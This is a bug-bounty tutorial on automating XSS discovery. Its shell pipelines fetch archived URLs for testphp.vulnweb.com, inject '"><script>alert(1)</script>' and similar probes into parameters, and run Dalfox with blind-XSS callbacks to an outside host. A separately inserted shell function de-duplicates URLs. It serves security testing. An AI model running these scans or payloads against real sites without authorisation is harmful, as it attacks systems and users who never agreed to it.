Automated XSS

Make sure you have Go installed on your machine.

To install Go on your machine:

  1) sudo apt install -y golang
  2) export GOROOT=/usr/lib/go
  3) export GOPATH=$HOME/go
  4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
  5) source ~/.bashrc

How to Hunt Blind XSS using Dalfox?

  • Use waybackurls by tomnomnom to fetch URLs for the target.

  • Use GF patterns to find parameters that are likely to be XSS-vulnerable.

  • Use Dalfox to find XSS.

  • Steps:

waybackurls testphp.vulnweb.com | gf xss | sed 's/=[^&]*/=/g' | sort -u | tee Possible_xss.txt | dalfox pipe -b blindxss.xss.ht > output.txt

How to Hunt Reflected XSS?

  • Use waybackurls by tomnomnom to fetch URLs for the target.

  • Use qsreplace: it accepts URLs on stdin, replaces every query-string value with a user-supplied value, and outputs each combination of query-string parameters only once per host and path.

  • Steps:

waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read -r host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo -e "$host \033[0;31mVulnerable\033[0m"; done

Find parameters that do not filter special characters - one-liner

echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackurls.txt | grep -Eiv '\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)(\?|$)' | qsreplace '"><()' | tee combinedfuzz.json | while read -r host; do curl --silent --path-as-is --insecure "$host" | grep -qs '"><()' && echo -e "$host \033[91m Vulnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt
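The de-duplication step that both pipelines above depend on, written out as a shell function so it can be checked offline. This is an added example, not code from QuickXSS or from the original page: `normalize_urls` reads a waybackurls-style feed on stdin, drops static assets, blanks every parameter value (not just everything after the first `=`), sorts parameter names so that `a=1&b=2` and `b=2&a=1` collapse into one line, and prints each host+path+parameter set once. The sample URLs in `sample_urls` are constructed.

```shell
#!/usr/bin/env bash
# Added example (not QuickXSS code): normalise a waybackurls feed before
# fuzzing. Reads URLs on stdin and prints one line per host+path+parameter
# set, with every value blanked, so each injection point is tested once.
normalize_urls() {
  grep '=' \
  | grep -Eiv '\.(jpg|jpeg|js|css|gif|tiff?|png|woff2?|ico|pdf|svg|txt)(\?|$)' \
  | awk '{
      q = index($0, "?"); if (q == 0) next
      base = substr($0, 1, q - 1); query = substr($0, q + 1)
      sub(/#.*/, "", query)                      # drop any fragment
      n = split(query, parts, "&"); m = 0
      for (i = 1; i <= n; i++) {                 # keep names, drop values
        name = parts[i]; sub(/=.*/, "", name)
        if (name != "") keys[++m] = name
      }
      for (i = 2; i <= m; i++) {                 # insertion sort of names so
        v = keys[i]; j = i - 1                   # parameter order is irrelevant
        while (j > 0 && keys[j] > v) { keys[j + 1] = keys[j]; j-- }
        keys[j + 1] = v
      }
      out = base "?"
      for (i = 1; i <= m; i++) out = out (i > 1 ? "&" : "") keys[i] "="
      print out
      split("", keys)                            # reset for the next URL
    }' \
  | sort -u
}

# Constructed sample input standing in for `waybackurls testphp.vulnweb.com`.
sample_urls() {
  printf '%s\n' \
    'http://testphp.vulnweb.com/search.php?test=query&page=2' \
    'http://testphp.vulnweb.com/search.php?page=1&test=abc' \
    'http://testphp.vulnweb.com/images/logo.png?v=3' \
    'http://testphp.vulnweb.com/index.php' \
    'http://testphp.vulnweb.com/listproducts.php?cat=1#top'
}

sample_urls | normalize_urls
```

The five sample lines reduce to two candidate URLs, which is what you would then feed to qsreplace or `dalfox pipe`.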

Find the script here: QuickXSS

If you have any questions, reach out to me via Twitter.

Twitter: Fani Malik

Twitter: Faizee Asad

Twitter: Prince Prafull
